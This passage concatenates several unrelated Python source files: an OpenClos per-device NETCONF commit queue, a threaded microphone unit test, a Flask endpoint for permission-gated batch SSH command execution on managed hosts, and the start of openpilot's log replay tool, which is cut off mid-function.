        self.deviceUser = deployStatusObject.overlay_device.username
        self.devicePass = deployStatusObject.overlay_device.getCleartextPassword()
        self.configlet = deployStatusObject.configlet
        self.operation = deployStatusObject.operation
        # one job queue exists per device; key combines address and id
        self.queueId = '%s:%s' % (self.deviceIp, self.deviceId)

    def updateStatus(self, status, reason=None):
        """Persist `status` (and optional failure `reason`) for this job's
        deploy-status row; for a successful delete also clean up the related
        status rows and, when no rows remain, the deployed object itself."""
        try:
            with self.parent._dao.getReadWriteSession() as session:
                statusObject = session.query(OverlayDeployStatus).filter(OverlayDeployStatus.id == self.id).one()
                if statusObject.operation == "create":
                    statusObject.update(status, reason)
                elif statusObject.operation == "delete":
                    if status == "success":
                        # delete succeeded on this device: drop all status rows
                        # for this object/device pair
                        relatedStatusObjects = session.query(OverlayDeployStatus).filter(
                            OverlayDeployStatus.object_url == statusObject.object_url).filter(
                            OverlayDeployStatus.overlay_device_id == self.deviceId).all()
                        self.parent._dao.deleteObjects(session, relatedStatusObjects)
                        # If all devices are done, then delete the object
                        deployStatusCount = session.query(OverlayDeployStatus).filter(
                            OverlayDeployStatus.object_url == statusObject.object_url).count()
                        if deployStatusCount == 0:
                            objectTypeId = statusObject.getObjectTypeAndId()
                            obj = session.query(objectTypeId[0]).filter_by(id=objectTypeId[1]).one()
                            if obj:
                                session.delete(obj)
                    else:
                        statusObject.update(status, reason)
                elif statusObject.operation == "update":
                    statusObject.update(status, reason)
                    ## TODO: add hook to update the actual object
        except Exception as exc:
            logger.error("%s", exc)
            logger.error('StackTrace: %s', traceback.format_exc())

    def commit(self):
        """Push the configlet to the device over NETCONF, record the outcome
        via updateStatus() and mark the device idle again."""
        try:
            # Note we don't want to hold the caller's session for too long since this function is potentially lengthy
            # that is why we don't ask caller to pass a dbSession to us. Instead we get the session inside this method
            # only long enough to update the status value
            logger.info("Job %s: starting commit on device [%s]", self.id, self.queueId)

            # first update the status to 'progress'
            self.updateStatus("progress")

            # now commit and set the result/reason accordingly
            result = 'success'
            reason = None
            try:
                with CachedConnectionFactory.getInstance().connection(NetconfConnection,
                                                                      self.deviceIp,
                                                                      username=self.deviceUser,
                                                                      password=self.devicePass) as connector:
                    connector.updateConfig(self.configlet)
            except DeviceConnectFailed as exc:
                #logger.error("%s", exc)
                #logger.error('StackTrace: %s', traceback.format_exc())
                result = 'failure'
                reason = exc.message
            except DeviceRpcFailed as exc:
                #logger.error("%s", exc)
                #logger.error('StackTrace: %s', traceback.format_exc())
                result = 'failure'
                reason = exc.message
            except Exception as exc:
                #logger.error("%s", exc)
                #logger.error('StackTrace: %s', traceback.format_exc())
                result = 'failure'
                reason = str(exc)

            # commit is done so update the result
            self.updateStatus(result, reason)
            logger.info("Job %s: done with device [%s]", self.id, self.queueId)
            # remove device id from cache so the dispatcher can schedule the
            # next job queued for this device
            self.parent.markDeviceIdle(self.queueId)
        except Exception as exc:
            logger.error("Job %s: error '%s'", self.id, exc)
            logger.error('StackTrace: %s', traceback.format_exc())
            raise
class OverlayCommitQueue(SingletonBase):
    """Singleton dispatcher that serializes configlet commits per device.

    Jobs are queued per device (one Queue per queueId) and a background
    thread periodically submits at most one job per idle device to a
    thread pool.
    """

    def __init__(self, daoClass=DEFAULT_DAO_CLASS):
        self._dao = daoClass.getInstance()
        # event to stop from sleep
        self.stopEvent = Event()
        self.__lock = RLock()
        self.__devicesInProgress = set()  # queueIds with a commit currently running
        self.__deviceQueues = {}  # queueId -> Queue of OverlayCommitJob
        self.maxWorkers = DEFAULT_MAX_THREADS
        self.dispatchInterval = DEFAULT_DISPATCH_INTERVAL
        self.thread = Thread(target=self.dispatchThreadFunction, args=())
        self.started = False

        conf = OpenClosProperty().getProperties()
        # iterate 'plugin' section of openclos.yaml and install routes on all plugins
        if 'plugin' in conf:
            plugins = conf['plugin']
            for plugin in plugins:
                if plugin['name'] == 'overlay':
                    # allow the overlay plugin config to override pool size
                    # and dispatch period
                    maxWorkers = plugin.get('threadCount')
                    if maxWorkers is not None:
                        self.maxWorkers = maxWorkers
                    dispatchInterval = plugin.get('dispatchInterval')
                    if dispatchInterval is not None:
                        self.dispatchInterval = dispatchInterval
                    break
        self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=self.maxWorkers)

    def addJobs(self, deployStatusObjects):
        """Wrap each deploy-status row in an OverlayCommitJob and append it to
        its device's queue; returns the created jobs."""
        jobs = []
        for deployStatusObject in deployStatusObjects:
            jobs.append(OverlayCommitJob(self, deployStatusObject))
            logger.debug("Job %s: added to device [%s]", jobs[-1].id, jobs[-1].queueId)
        with self.__lock:
            for job in jobs:
                if job.queueId not in self.__deviceQueues:
                    self.__deviceQueues[job.queueId] = Queue.Queue()
                self.__deviceQueues[job.queueId].put(job)
        return jobs

    '''
    To be used by unit test only
    '''
    def _getDeviceQueues(self):
        return self.__deviceQueues

    def runJobs(self):
        """Submit at most one queued job per idle device to the thread pool
        and drop device queues that became empty."""
        # check device queues (round robin)
        # Note we only hold on to the lock long enough to retrieve the job from the queue.
        # Then we release the lock before we do the actual commit
        with self.__lock:
            toBeDeleted = []
            for queueId, deviceQueue in self.__deviceQueues.iteritems():
                # find an idle device
                if queueId not in self.__devicesInProgress:
                    self.__devicesInProgress.add(queueId)
                    logger.debug("Device [%s] has NO commit in progress. Prepare for commit", queueId)
                    # retrieve the job
                    try:
                        job = deviceQueue.get_nowait()
                        # start commit progress; the job calls markDeviceIdle
                        # when it finishes
                        self.executor.submit(job.commit)
                        deviceQueue.task_done()
                        if deviceQueue.empty():
                            logger.debug("Device [%s] job queue is empty", queueId)
                            # Note don't delete the empty job queues within the iteration.
                            toBeDeleted.append(queueId)
                    except Queue.Empty as exc:
                        # NOTE(review): queueId stays in __devicesInProgress here
                        # and markDeviceIdle is never called for it -- if this
                        # branch is ever reached the device would be blocked
                        # forever. It looks unreachable because empty queues are
                        # deleted below; confirm.
                        logger.debug("Device [%s] job queue is empty", queueId)
                        # Note don't delete the empty job queues within the iteration.
                        toBeDeleted.append(queueId)
                else:
                    logger.debug("Device [%s] has commit in progress. Skipped", queueId)
            # Now it is safe to delete all empty job queues
            for queueId in toBeDeleted:
                logger.debug("Deleting job queue for device [%s]", queueId)
                del self.__deviceQueues[queueId]

    def markDeviceIdle(self, queueId):
        # called by a finished job so the next queued commit can be scheduled
        with self.__lock:
            self.__devicesInProgress.discard(queueId)

    def start(self):
        """Start the dispatch thread (idempotent)."""
        with self.__lock:
            if self.started:
                return
            else:
                self.started = True
        logger.info("Starting OverlayCommitQueue...")
        self.thread.start()
        logger.info("OverlayCommitQueue started")

    def stop(self):
        """Signal the dispatch thread to exit, shut the pool down and join."""
        logger.info("Stopping OverlayCommitQueue...")
        self.stopEvent.set()
        self.executor.shutdown()
        with self.__lock:
            if self.started:
                self.thread.join()
        logger.info("OverlayCommitQueue stopped")

    def dispatchThreadFunction(self):
        # wake up every dispatchInterval seconds (or immediately on stopEvent)
        # and schedule pending jobs
        try:
            while True:
                self.stopEvent.wait(self.dispatchInterval)
                if not self.stopEvent.is_set():
                    self.runJobs()
                else:
                    logger.debug("OverlayCommitQueue: stopEvent is set")
                    return
        except Exception as exc:
            logger.error("Encounted error '%s' on OverlayCommitQueue", exc)
            raise
# def main():
# conf = OpenClosProperty().getProperties()
# dao = Dao.getInstance()
# from jnpr.openclos.overlay.overlay import Overlay
# overlay = Overlay(conf, Dao.getInstance())
# with dao.getReadWriteSession() as session:
# d1 = overlay.createDevice(session, 'd1', 'description for d1', 'spine', '192.168.48.201', '1.1.1.1', 'pod1', 'test', 'foobar')
# d2 = overlay.createDevice(session, 'd2', 'description for d2', 'spine', '192.168.48.202', '1.1.1.2', 'pod1', 'test', 'foobar')
# d1_id = d1.id
# d2_id = d2.id
# f1 = overlay.createFabric(session, 'f1', '', 65001, '2.2.2.2', [d1, d2])
# f1_id = f1.id
# f2 = overlay.createFabric(session, 'f2', '', 65002, '3.3.3.3', [d1, d2])
# f2_id = f2.id
# t1 = overlay.createTenant(session, 't1', '', f1)
# t1_id = t1.id
# t2 = overlay.createTenant(session, 't2', '', f2)
# t2_id = t2.id
# v1 = overlay.createVrf(session, 'v1', '', 100, '1.1.1.1', t1)
# v1_id = v1.id
# v2 = overlay.createVrf(session, 'v2', '', 101, '1.1.1.2', t2)
# v2_id = v2.id
# n1 = overlay.createNetwork(session, 'n1', '', v1, 1000, 100, False)
# n1_id = n1.id
# n2 = overlay.createNetwork(session, 'n2', '', v1, 1001, 101, False)
# n2_id = n2.id
# commitQueue = OverlayCommitQueue.getInstance()
# commitQueue.dispatchInterval = 1
# commitQueue.start()
# with dao.getReadWriteSession() as session:
# status_db = session.query(OverlayDeployStatus).all()
# for s in status_db:
# commitQueue.addJob(s)
# raw_input("Press any key to stop...")
# commitQueue.stop()
# if __name__ == '__main__':
# main()
|
test_sync_microphone.py | import logging
import numpy as np
import sys
import threading
import unittest
from typing import Generator
from cltl.backend.api.microphone import MIC_RESOURCE_NAME, AudioParameters
from cltl.backend.impl.sync_microphone import SynchronizedMicrophone
from cltl.backend.spi.audio import AudioSource
from cltl.combot.infra.resource.threaded import ThreadedResourceManager
logger = logging.getLogger(__name__)
logger.addHandler(logging.StreamHandler(stream=sys.stdout))
logger.setLevel(logging.DEBUG)
def wait(lock: threading.Event):
    """Block until *lock* (an Event) is set; fail the enclosing test on timeout.

    The 699 s timeout is effectively "forever" for a unit test — presumably a
    generous anti-flakiness guard; TODO confirm the intended value.
    """
    signalled = lock.wait(699)
    if not signalled:
        raise unittest.TestCase.failureException("Latch timed out")
class TestSource(AudioSource):
    """Scripted AudioSource that emits ten 2-sample frames, then a None terminator.

    Optional events let tests synchronize with the audio generator:
      * processing:       set by the source once frame index 4 is produced
      * pause_processing: once `processing` is set (or no processing event was
                          supplied), the source blocks on this event before
                          yielding each subsequent frame
      * finished:         set by the source after all frames were yielded
    """
    def __init__(self, processing: threading.Event = None,
                 pause_processing: threading.Event = None,
                 finished: threading.Event = None):
        self.processing = processing
        self.pause_processing = pause_processing
        self.finished = finished

    @property
    def rate(self):
        # sample rate in Hz
        return 200

    @property
    def channels(self):
        return 1

    @property
    def frame_size(self):
        # samples per frame
        return 2

    @property
    def depth(self):
        # bytes per sample
        return 2

    @property
    def audio(self) -> Generator[np.array, None, None]:
        for i in range(10):
            # Block on pause_processing, but only after `processing` fired
            # (or immediately when no processing event was supplied).
            # Fix: use is_set() instead of the deprecated isSet() alias.
            if (not self.processing or self.processing.is_set()) and self.pause_processing:
                wait(self.pause_processing)
            if self.processing and i == 4:
                self.processing.set()
            yield np.full((2,), i, dtype=np.int16)
        if self.finished:
            self.finished.set()
        yield None
class SynchronizedMicrophoneTest(unittest.TestCase):
    """Tests for SynchronizedMicrophone driven by the scripted TestSource."""
    def setUp(self):
        source = TestSource()
        self.resource_manager = ThreadedResourceManager()
        self.mic = SynchronizedMicrophone(source, self.resource_manager)
        self.mic.start()

    def tearDown(self):
        self.mic.stop()

    def test_listen(self):
        """Plain listen: all ten frames plus the None terminator come through."""
        self.assertFalse(self.mic.muted)
        with self.mic.listen() as (mic_audio, params):
            audio = [frame for frame in mic_audio]
            parameters = params
        self.assertEqual(11, len(audio))
        self.assertIsNone(audio[10])
        self.assertTrue(all(frame.shape == (2,) for frame in audio[:-1]))
        self.assertEqual([i for i in range(10)], [frame[0] for frame in audio[:-1]])
        # AudioParameters mirrors TestSource: rate=200, channels=1, frame_size=2, depth=2
        self.assertEqual(AudioParameters(200, 1, 2, 2), parameters)
        self.assertFalse(self.mic.muted)

    def test_mute(self):
        """Mute mid-stream: muting after frame 4 truncates the stream early."""
        audio_running = threading.Event()
        muted = threading.Event()
        # The source pauses on `muted` once frame 4 was reached, giving the
        # mute thread a deterministic window to act.
        source = TestSource(processing=audio_running, pause_processing=muted)
        self.resource_manager = ThreadedResourceManager()
        self.mic = SynchronizedMicrophone(source, self.resource_manager)

        def mute_mic():
            wait(audio_running)
            self.mic.mute()
            muted.set()
        mute_thread = threading.Thread(name="mute", target=mute_mic)

        self.mic.start()
        mute_thread.start()

        self.assertFalse(self.mic.muted)
        with self.mic.listen() as (mic_audio, params):
            audio = [frame for frame in mic_audio]
        # Six frames (0..5) plus the None terminator.
        self.assertEqual(7, len(audio))
        self.assertIsNone(audio[6])
        self.assertTrue(all(frame.shape == (2,) for frame in audio[:-1]))
        self.assertEqual([i for i in range(6)], [frame[0] for frame in audio[:-1]])
        self.assertTrue(self.mic.muted)

    def test_mute_with_readers(self):
        """
        Test that mic is only muted when readers are finished.

        * Start audio
        * Wait until audio is processing
        * Start reader and acquire reader lock
        * Delay audio until mute
        * Call mute
        * Test that not muted
        * Wait until audio is finished
        * Test that not muted
        * Release reader lock and stop reader
        * Await muted
        * Test mic is muted
        """
        audio_running = threading.Event()
        audio_finished = threading.Event()
        reader_started = threading.Event()
        reader_finish = threading.Event()
        mute = threading.Event()
        muted = threading.Event()

        def mute_mic():
            # Mute only once the reader holds the read lock.
            wait(reader_started)
            wait(mute)
            mic.mute()
            muted.set()
        mute_thread = threading.Thread(name="mute", target=mute_mic)

        def reader():
            wait(audio_running)
            with resource_manager.get_read_lock(MIC_RESOURCE_NAME):
                reader_started.set()
                wait(reader_finish)
        reader_thread = threading.Thread(name="reader", target=reader)

        source = TestSource(processing=audio_running, pause_processing=mute, finished=audio_finished)
        resource_manager = ThreadedResourceManager()
        mic = SynchronizedMicrophone(source, resource_manager)

        def run_mic():
            mic.start()
            with mic.listen() as (mic_audio, params):
                [frame for frame in mic_audio]
        mic_thread = threading.Thread(name="mic", target=run_mic)

        mic_thread.start()
        reader_thread.start()
        mute_thread.start()

        wait(reader_started)
        self.assertFalse(mic.muted)
        self.assertUnset(audio_finished)
        mute.set()
        self.assertFalse(mic.muted)
        self.assertSet(audio_finished)
        # The mute must be deferred while the reader still holds the lock.
        self.assertUnset(muted)
        self.assertFalse(mic.muted)
        reader_finish.set()
        self.assertSet(muted)
        self.assertTrue(mic.muted)

    def assertUnset(self, lock):
        # Assert the event does NOT fire within a short grace period.
        self.assertFalse(lock.wait(0.1))

    def assertSet(self, lock):
        # Assert the event fires within a short grace period.
        self.assertTrue(lock.wait(0.1))
|
host_exec.py | from flask import Blueprint, request
from apps.assets.models import HostExecTemplate, Host
from libs.tools import json_response, JsonParser, Argument, QueuePool
from libs.ssh import ssh_exec_command_with_stream, get_ssh_client
from public import db
from libs.decorators import require_permission
from threading import Thread
import json
import uuid
blueprint = Blueprint(__name__, __name__)
@blueprint.route('/tpl/', methods=['GET'])
@require_permission('assets_host_exec_view | assets_host_exec | assets_host_exec_tpl_view')
def get():
    """Paginated listing of host-exec templates with optional filters.

    Query args: page (int, -1 returns everything unpaginated), pagesize (int),
    tpl_query (optional dict with 'name_field' / 'type_field' filters).
    """
    form, error = JsonParser(Argument('page', type=int, default=1, required=False),
                             Argument('pagesize', type=int, default=10, required=False),
                             Argument('tpl_query', type=dict, required=False),).parse(request.args)
    if error is None:
        tpl_data = HostExecTemplate.query
        if form.page == -1:
            # page == -1 means "return everything, unpaginated"
            return json_response({'data': [x.to_json() for x in tpl_data.all()], 'total': -1})
        # Fix: tpl_query is optional and may be None or lack keys -- guard
        # before indexing (previously raised TypeError/KeyError on requests
        # that omit it).
        tpl_query = form.tpl_query or {}
        if tpl_query.get('name_field'):
            tpl_data = tpl_data.filter(HostExecTemplate.tpl_name.like('%{}%'.format(tpl_query['name_field'])))
        if tpl_query.get('type_field'):
            tpl_data = tpl_data.filter_by(tpl_type=tpl_query['type_field'])
        result = tpl_data.limit(form.pagesize).offset((form.page - 1) * form.pagesize).all()
        return json_response({'data': [x.to_json() for x in result], 'total': tpl_data.count()})
    return json_response(message=error)
@blueprint.route('/tpl/', methods=['POST'])
@require_permission('assets_host_exec_tpl_add')
def post():
    """Create a new host-exec template from the posted JSON body."""
    form, error = JsonParser('tpl_name', 'tpl_type', 'tpl_content',
                             Argument('tpl_desc', nullable=True, required=False)).parse()
    if error is not None:
        return json_response(message=error)
    template = HostExecTemplate(**form)
    template.save()
    return json_response(template)
@blueprint.route('/tpl/<int:tpl_id>', methods=['DELETE'])
@require_permission('assets_host_exec_tpl_del')
def delete(tpl_id):
    """Delete the host-exec template with the given id (404 if absent)."""
    template = HostExecTemplate.query.get_or_404(tpl_id)
    template.delete()
    return json_response()
@blueprint.route('/tpl/<int:tpl_id>', methods=['PUT'])
@require_permission('assets_host_exec_tpl_edit')
def put(tpl_id):
    """Update an existing host-exec template (404 if absent)."""
    form, error = JsonParser('tpl_name', 'tpl_type', 'tpl_content',
                             Argument('tpl_desc', nullable=True, required=False)).parse()
    if error is not None:
        return json_response(message=error)
    template = HostExecTemplate.query.get_or_404(tpl_id)
    template.update(**form)
    return json_response(template)
@blueprint.route('/tpl_type', methods=['GET'])
@require_permission('assets_host_exec_view | assets_host_exec_tpl_view')
def fetch_tpl_type():
    """List the distinct template types currently stored."""
    rows = db.session.query(HostExecTemplate.tpl_type.distinct().label('tpl_type')).all()
    return json_response([row.tpl_type for row in rows])
@blueprint.route('/exec_command/<string:token>', methods=['DELETE'])
@require_permission('assets_host_exec')
def exec_delete(token):
    """Abort a running batch execution identified by *token*."""
    queue = QueuePool.get_queue(token)
    if queue:
        queue.destroy()
    return json_response()
@blueprint.route('/exec_command', methods=['POST'])
@require_permission('assets_host_exec')
def exec_host_command():
    """Run a command on the selected hosts in parallel.

    Returns a token the client uses to poll the result queue.
    """
    form, error = JsonParser('hosts_id', 'command').parse()
    if error is not None:
        return json_response(message=error)
    hosts = Host.query.filter(Host.id.in_(tuple(form.hosts_id))).all()
    token = uuid.uuid4().hex
    queue = QueuePool.make_queue(token, len(hosts))
    # one worker thread per target host
    for host in hosts:
        Thread(target=hosts_exec, args=(queue, host.ssh_ip, host.ssh_port, form.command)).start()
    return json_response(token)
def hosts_exec(q, ip, port, command):
    """Execute *command* on ip:port over SSH, streaming output lines into *q*.

    Each queue item is {"ip:port": line}; a trailing marker line reports
    success or failure, and q.done() is signalled either way.
    """
    host_key = '%s:%s' % (ip, port)
    try:
        client = get_ssh_client(ip, port)
        # ensure the connection is closed when the queue is destroyed
        q.destroyed.append(client.close)
        for line in ssh_exec_command_with_stream(client, command):
            q.put({host_key: line})
        q.put({host_key: '\n** 执行完成 **'})
        q.done()
    except Exception as e:
        q.put({host_key: '%s\n' % e})
        q.put({host_key: '\n** 执行异常结束 **'})
        q.done()
|
unlogger.py | #!/usr/bin/env python3
import argparse
import os
import sys
import zmq
import time
import signal
import multiprocessing
from uuid import uuid4
from collections import namedtuple
from collections import deque
from datetime import datetime
from cereal import log as capnp_log
from cereal.services import service_list
from cereal.messaging import pub_sock, MultiplePublishersError
from cereal.visionipc.visionipc_pyx import VisionIpcServer, VisionStreamType # pylint: disable=no-name-in-module, import-error
from common import realtime
from common.transformations.camera import eon_f_frame_size, tici_f_frame_size
from tools.lib.kbhit import KBHit
from tools.lib.logreader import MultiLogIterator
from tools.lib.route import Route
from tools.lib.framereader import rgb24toyuv420
from tools.lib.route_framereader import RouteFrameReader
# Commands.
# Playback-control messages exchanged between the keyboard thread, the
# control thread (unlogger_thread) and the worker process (UnloggerWorker).
SetRoute = namedtuple("SetRoute", ("name", "start_time", "data_dir"))
SeekAbsoluteTime = namedtuple("SeekAbsoluteTime", ("secs",))
SeekRelativeTime = namedtuple("SeekRelativeTime", ("secs",))
TogglePause = namedtuple("TogglePause", ())
StopAndQuit = namedtuple("StopAndQuit", ())
# Pseudo message types used on the data socket for camera frames.
VIPC_RGB = "rgb"
VIPC_YUV = "yuv"
class UnloggerWorker(object):
    """Worker process that reads a route's logs/frames and streams them over zmq.

    Commands (SetRoute / Seek* / StopAndQuit) arrive on a PULL socket; decoded
    messages and camera frames are pushed to the control thread on a PUSH socket.
    """
    def __init__(self):
        self._frame_reader = None
        self._cookie = None
        # buffered (typ, msg, route_time, cookie) tuples awaiting send
        self._readahead = deque()

    def run(self, commands_address, data_address, pub_types):
        """Main loop: apply pending commands, then read and forward log data."""
        # Fresh zmq context per process (avoids inherited-context problems
        # after fork/multiprocessing).
        zmq.Context._instance = None
        commands_socket = zmq.Context.instance().socket(zmq.PULL)
        commands_socket.connect(commands_address)
        data_socket = zmq.Context.instance().socket(zmq.PUSH)
        data_socket.connect(data_address)
        poller = zmq.Poller()
        poller.register(commands_socket, zmq.POLLIN)
        # We can't publish frames without roadEncodeIdx, so add when it's missing.
        if "roadCameraState" in pub_types:
            pub_types["roadEncodeIdx"] = None
        # gc.set_debug(gc.DEBUG_LEAK | gc.DEBUG_OBJECTS | gc.DEBUG_STATS | gc.DEBUG_SAVEALL |
        # gc.DEBUG_UNCOLLECTABLE)
        # TODO: WARNING pycapnp leaks memory all over the place after unlogger runs for a while, gc
        # pauses become huge because there are so many tracked objects solution will be to switch to new
        # cython capnp
        try:
            route = None
            while True:
                # Drain all pending commands; block here until a route is set.
                while poller.poll(0.) or route is None:
                    cookie, cmd = commands_socket.recv_pyobj()
                    route = self._process_commands(cmd, route, pub_types)
                # **** get message ****
                self._read_logs(cookie, pub_types)
                self._send_logs(data_socket)
        finally:
            if self._frame_reader is not None:
                self._frame_reader.close()
            data_socket.close()
            commands_socket.close()

    def _read_logs(self, cookie, pub_types):
        """Top up the readahead deque (to 1000 entries) with upcoming messages."""
        fullHEVC = capnp_log.EncodeIndex.Type.fullHEVC
        lr = self._lr
        while len(self._readahead) < 1000:
            route_time = lr.tell()
            msg = next(lr)
            typ = msg.which()
            if typ not in pub_types:
                continue
            if typ == "liveMapData":
                print(msg)
            # **** special case certain message types ****
            if typ == "roadEncodeIdx" and msg.roadEncodeIdx.type == fullHEVC:
                # this assumes the roadEncodeIdx always comes before the frame
                self._frame_id_lookup[
                    msg.roadEncodeIdx.frameId] = msg.roadEncodeIdx.segmentNum, msg.roadEncodeIdx.segmentId
                #print "encode", msg.roadEncodeIdx.frameId, len(self._readahead), route_time
            self._readahead.appendleft((typ, msg, route_time, cookie))

    def _send_logs(self, data_socket):
        """Drain the readahead deque down to 500 entries, pushing messages
        (and, for camera states, the corresponding frames) downstream."""
        while len(self._readahead) > 500:
            typ, msg, route_time, cookie = self._readahead.pop()
            smsg = msg.as_builder()
            if typ == "roadCameraState":
                frame_id = msg.roadCameraState.frameId
                # Frame exists, make sure we have a framereader.
                # load the frame readers as needed
                s1 = time.time()
                try:
                    img = self._frame_reader.get(frame_id, pix_fmt="rgb24")
                except Exception:
                    img = None
                fr_time = time.time() - s1
                if fr_time > 0.05:
                    print("FRAME(%d) LAG -- %.2f ms" % (frame_id, fr_time*1000.0))
                if img is not None:
                    extra = (smsg.roadCameraState.frameId, smsg.roadCameraState.timestampSof, smsg.roadCameraState.timestampEof)
                    # send YUV frame
                    if os.getenv("YUV") is not None:
                        img_yuv = rgb24toyuv420(img)
                        data_socket.send_pyobj((cookie, VIPC_YUV, msg.logMonoTime, route_time, extra), flags=zmq.SNDMORE)
                        data_socket.send(img_yuv.flatten().tobytes(), copy=False)
                    img = img[:, :, ::-1]  # Convert RGB to BGR, which is what the camera outputs
                    img = img.flatten()
                    bts = img.tobytes()
                    smsg.roadCameraState.image = bts
                    # send RGB frame
                    data_socket.send_pyobj((cookie, VIPC_RGB, msg.logMonoTime, route_time, extra), flags=zmq.SNDMORE)
                    data_socket.send(bts, copy=False)
            data_socket.send_pyobj((cookie, typ, msg.logMonoTime, route_time), flags=zmq.SNDMORE)
            data_socket.send(smsg.to_bytes(), copy=False)

    def _process_commands(self, cmd, route, pub_types):
        """Apply one control command; returns the (possibly new) route."""
        seek_to = None
        if route is None or (isinstance(cmd, SetRoute) and route.name != cmd.name):
            # New route: (re)open the log iterator and, when frames are being
            # published, a frame reader keyed by the encode-index lookup table.
            seek_to = cmd.start_time
            route = Route(cmd.name, cmd.data_dir)
            self._lr = MultiLogIterator(route.log_paths(), wraparound=True)
            if self._frame_reader is not None:
                self._frame_reader.close()
            if "roadCameraState" in pub_types or "roadEncodeIdx" in pub_types:
                # reset frames for a route
                self._frame_id_lookup = {}
                self._frame_reader = RouteFrameReader(
                    route.camera_paths(), None, self._frame_id_lookup, readahead=True)
        # always reset this on a seek
        if isinstance(cmd, SeekRelativeTime):
            seek_to = self._lr.tell() + cmd.secs
        elif isinstance(cmd, SeekAbsoluteTime):
            seek_to = cmd.secs
        elif isinstance(cmd, StopAndQuit):
            exit()
        if seek_to is not None:
            print("seeking", seek_to)
            if not self._lr.seek(seek_to):
                print("Can't seek: time out of bounds")
            else:
                next(self._lr)  # ignore one
        return route
def _get_address_send_func(address):
    """Return the send callable of a newly created publisher for *address*."""
    return pub_sock(address).send
def _get_vipc_server(length):
    """Create and start a visionipc server sized for the camera whose RGB
    frame byte length (3 * w * h) matches *length*."""
    frame_sizes = {3 * w * h: (w, h) for (w, h) in [tici_f_frame_size, eon_f_frame_size]}
    width, height = frame_sizes[length]
    server = VisionIpcServer("camerad")
    server.create_buffers(VisionStreamType.VISION_STREAM_RGB_BACK, 4, True, width, height)
    server.create_buffers(VisionStreamType.VISION_STREAM_YUV_BACK, 40, False, width, height)
    server.start_listener()
    return server
def unlogger_thread(command_address, forward_commands_address, data_address, run_realtime,
                    address_mapping, publish_time_length, bind_early, no_loop, no_visionipc):
    """Control thread: receives decoded messages from the worker process and
    publishes them over messaging/visionipc, pacing to real time if requested.

    User commands (seek/pause/quit) are forwarded to the worker; a 'generation'
    counter lets stale in-flight data be discarded after a seek.
    """
    # Clear context to avoid problems with multiprocessing.
    zmq.Context._instance = None
    context = zmq.Context.instance()
    command_sock = context.socket(zmq.PULL)
    command_sock.bind(command_address)
    forward_commands_socket = context.socket(zmq.PUSH)
    forward_commands_socket.bind(forward_commands_address)
    data_socket = context.socket(zmq.PULL)
    data_socket.bind(data_address)
    # Set readahead to a reasonable number.
    data_socket.setsockopt(zmq.RCVHWM, 10000)
    poller = zmq.Poller()
    poller.register(command_sock, zmq.POLLIN)
    poller.register(data_socket, zmq.POLLIN)
    if bind_early:
        send_funcs = {
            typ: _get_address_send_func(address)
            for typ, address in address_mapping.items()
        }
        # Give subscribers a chance to connect.
        time.sleep(0.1)
    else:
        send_funcs = {}
    start_time = float("inf")
    printed_at = 0
    generation = 0
    paused = False
    reset_time = True
    prev_msg_time = None
    vipc_server = None
    while True:
        evts = dict(poller.poll())
        if command_sock in evts:
            cmd = command_sock.recv_pyobj()
            if isinstance(cmd, TogglePause):
                # Pausing simply stops polling the data socket.
                paused = not paused
                if paused:
                    poller.modify(data_socket, 0)
                else:
                    poller.modify(data_socket, zmq.POLLIN)
            else:
                # Forward the command to the log data thread.
                # TODO: Remove everything on data_socket.
                generation += 1
                forward_commands_socket.send_pyobj((generation, cmd))
                if isinstance(cmd, StopAndQuit):
                    return
            reset_time = True
        elif data_socket in evts:
            msg_generation, typ, msg_time, route_time, *extra = data_socket.recv_pyobj(flags=zmq.RCVMORE)
            msg_bytes = data_socket.recv()
            if msg_generation < generation:
                # Skip packets.
                continue
            if no_loop and prev_msg_time is not None and prev_msg_time > msg_time + 1e9:
                # Log time jumped back by more than 1s: the route wrapped; stop.
                generation += 1
                forward_commands_socket.send_pyobj((generation, StopAndQuit()))
                return
            prev_msg_time = msg_time
            msg_time_seconds = msg_time * 1e-9
            if reset_time:
                # Re-anchor the realtime schedule on the next message.
                msg_start_time = msg_time_seconds
                real_start_time = realtime.sec_since_boot()
                start_time = min(start_time, msg_start_time)
                reset_time = False
            if publish_time_length and msg_time_seconds - start_time > publish_time_length:
                generation += 1
                forward_commands_socket.send_pyobj((generation, StopAndQuit()))
                return
            # Print time.
            if abs(printed_at - route_time) > 5.:
                print("at", route_time)
                printed_at = route_time
            if typ not in send_funcs and typ not in [VIPC_RGB, VIPC_YUV]:
                if typ in address_mapping:
                    # Remove so we don't keep printing warnings.
                    address = address_mapping.pop(typ)
                    try:
                        print("binding", typ)
                        send_funcs[typ] = _get_address_send_func(address)
                    except Exception as e:
                        print("couldn't replay {}: {}".format(typ, e))
                        continue
                else:
                    # Skip messages that we are not registered to publish.
                    continue
            # Sleep as needed for real time playback.
            if run_realtime:
                msg_time_offset = msg_time_seconds - msg_start_time
                real_time_offset = realtime.sec_since_boot() - real_start_time
                lag = msg_time_offset - real_time_offset
                if lag > 0 and lag < 30:  # a large jump is OK, likely due to an out of order segment
                    if lag > 1:
                        print("sleeping for", lag)
                    time.sleep(lag)
                elif lag < -1:
                    # Relax the real time schedule when we slip far behind.
                    reset_time = True
            # Send message.
            try:
                if typ in [VIPC_RGB, VIPC_YUV]:
                    if not no_visionipc:
                        # Lazily create the visionipc server, sized from the
                        # first frame's byte length.
                        if vipc_server is None:
                            vipc_server = _get_vipc_server(len(msg_bytes))
                        i, sof, eof = extra[0]
                        stream = VisionStreamType.VISION_STREAM_RGB_BACK if typ == VIPC_RGB else VisionStreamType.VISION_STREAM_YUV_BACK
                        vipc_server.send(stream, msg_bytes, i, sof, eof)
                else:
                    send_funcs[typ](msg_bytes)
            except MultiplePublishersError:
                # Someone else took over this service; drop our publisher.
                del send_funcs[typ]
def timestamp_to_s(tss):
    """Convert a 'YYYY-MM-DD--HH-MM-SS' route timestamp to epoch seconds
    (interpreted in the local timezone, via time.mktime)."""
    parsed = datetime.strptime(tss, '%Y-%m-%d--%H-%M-%S')
    return time.mktime(parsed.timetuple())
def absolute_time_str(s, start_time):
    """Interpret *s* as seconds: either a plain float, or a route timestamp
    ('YYYY-MM-DD--HH-MM-SS') converted relative to *start_time*."""
    try:
        return float(s)
    except ValueError:
        # not a number -- treat it as a timestamp string
        return timestamp_to_s(s) - start_time
def _get_address_mapping(args):
    """Build the service -> publish-address map, honoring --min / --enabled /
    --disabled and any explicit <service>=<addr> overrides."""
    if args.min is not None:
        mocked = [
